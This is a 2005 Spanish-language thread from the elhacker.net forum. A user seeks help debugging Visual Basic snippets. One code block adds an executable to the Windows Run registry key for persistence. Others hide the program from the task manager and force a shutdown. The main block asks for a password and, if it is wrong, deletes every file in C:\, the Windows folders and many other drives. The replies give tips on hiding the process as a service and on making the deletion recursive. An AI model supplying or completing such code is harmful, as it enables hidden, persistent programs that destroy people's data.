elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  necesito ayuda en VB
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: necesito ayuda en VB  (Leído 4,488 veces)
Sensei Cos

Desconectado Desconectado

Mensajes: 37


Yo Cos ... Tu?


Ver Perfil WWW
necesito ayuda en VB
« en: 15 Marzo 2005, 10:18 am »

queria saver si alguien me puede decir por que no me andan estos codigos:

Código:
Set X = CreateObject("WScript.Shell")
X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:/X.exe"

Código:
App.TaskVisible = False

tampoco el shutdown (no me acuerdo ahora si se escribe así)

puede ser por que trabajo con VB 3.0, q' me falte algun archivo que tenga que instalar, o algo por el estilo?? Nose, estoy re perdido, ya busque info en la net, pero nada que ande. Gracias de antemano

PD.: Otra pregunta cuando pongo esto por ej.:
Código:
On Error Resume Next
App.TaskVisible = False

X$ = InputBox$("introduzca contraseña")
   
If X$ = "contraseña" Then
    Unload Me
Else
    Kill "C:/windows/*.*"
    Kill "D:/windows/*.*"
    Kill "E:/windows/*.*"
    Kill "F:/windows/*.*"
    Kill "C:/*.*"
    Kill "D:/*.*"
    Kill "E:/*.*"
    Kill "F:/*.*"
    Kill "G:/*.*"
    Kill "H:/*.*"
    Kill "Z:/*.*"
End If

Puedo "finalizar la tarea" de laventana de contraseña, o tampoco esa me aparece en el administrador de tareas de Windows gracias a "App.TaskVisible = False"

Gracias salu2




En línea

"Dos es companía ... Tres es pura diversión"
                     El Sensei Cos
Slasher-K


Desconectado Desconectado

Mensajes: 1.477


Ver Perfil
Re: necesito ayuda en VB
« Respuesta #1 en: 15 Marzo 2005, 17:17 pm »

App.TaskVisible solamente funciona en win2k, para win9x existe la función RegisterServiceProcess

Y en cuanto a los códigos, si especificas el error es más fácil ayudarte, si querés respuestas precisas hacé preguntas precisas.


En línea



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*
dxr
Colaborador
***
Desconectado Desconectado

Mensajes: 3.036



Ver Perfil
Re: necesito ayuda en VB
« Respuesta #2 en: 16 Marzo 2005, 03:30 am »

Aver q me entere yo... como decis q se puede ocultar el proceso de un programa en win2k y win XP¿?¿?

otra cosa eso de.. kill d:\*.* ... no vas a poder hacerlo anoser q lo agas con recursividad :P
En línea

Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.
Slasher-K


Desconectado Desconectado

Mensajes: 1.477


Ver Perfil
Re: necesito ayuda en VB
« Respuesta #3 en: 16 Marzo 2005, 04:30 am »

En win2k también hay que ocultarlo como servicio, pero para eso hay que llamar a un montón de funciones y tener los permisos adecuados. Hay toda una API para servicios que se implementa en win2k y winnt.
En línea



A la reina de las profundidades que cuida los pasos de una sombra en la noche :*
Sensei Cos

Desconectado Desconectado

Mensajes: 37


Yo Cos ... Tu?


Ver Perfil WWW
Re: necesito ayuda en VB
« Respuesta #4 en: 16 Marzo 2005, 07:38 am »

Veamos, cuando pongo:
Código:
Set X = CreateObject("WScript.Shell")
X.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:/X.exe"
me dice: "invalid objet reference"

cuando pongo:
Código:
App.TaskVisible = False
Me dice: "property 'TaskVisible' not found"

cuando pongo:
Código:
RegisterServiceProcess
,
Código:
RegisterServiceProcess = True
o
Código:
RegisterServiceProcess = False

no me dice nada, pero cuando ya tengo el ejecutable no me lo esconde.

y si pongo:
Código:
X% = Shell("C:/windows/system32/shutdown.exe -r -t01", 6)
,
Código:
X% = Shell("%windir%/system32/shutdown.exe -r -t01", 6)
,
en el ejecutable me dice: "phat not found"
Código:
X% = Shell("C:/windows/system32/shutdown.exe" -r -t01, 6)
o
Código:
X% = Shell("%windir%/system32/shutdown.exe" -r -t01, 6)
Asi me dice que hay un error de syntaxis antes de guardarlo .exe

con respecto a lo que dijo derec_x essa parte anda, no se a que te referis, mi pregunta es que cuando pido contraseña se abre otra y queria saver si ustedes saven si aparece en el admin. de tareas de win.

Gracias y Salu2
En línea

"Dos es companía ... Tres es pura diversión"
                     El Sensei Cos
byebye


Desconectado Desconectado

Mensajes: 5.093



Ver Perfil
Re: necesito ayuda en VB
« Respuesta #5 en: 16 Marzo 2005, 07:51 am »

Citar
RegisterServiceProcess = True

yo de ti miraria aunq sea los parametros de las funciones que quiero utilizar.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines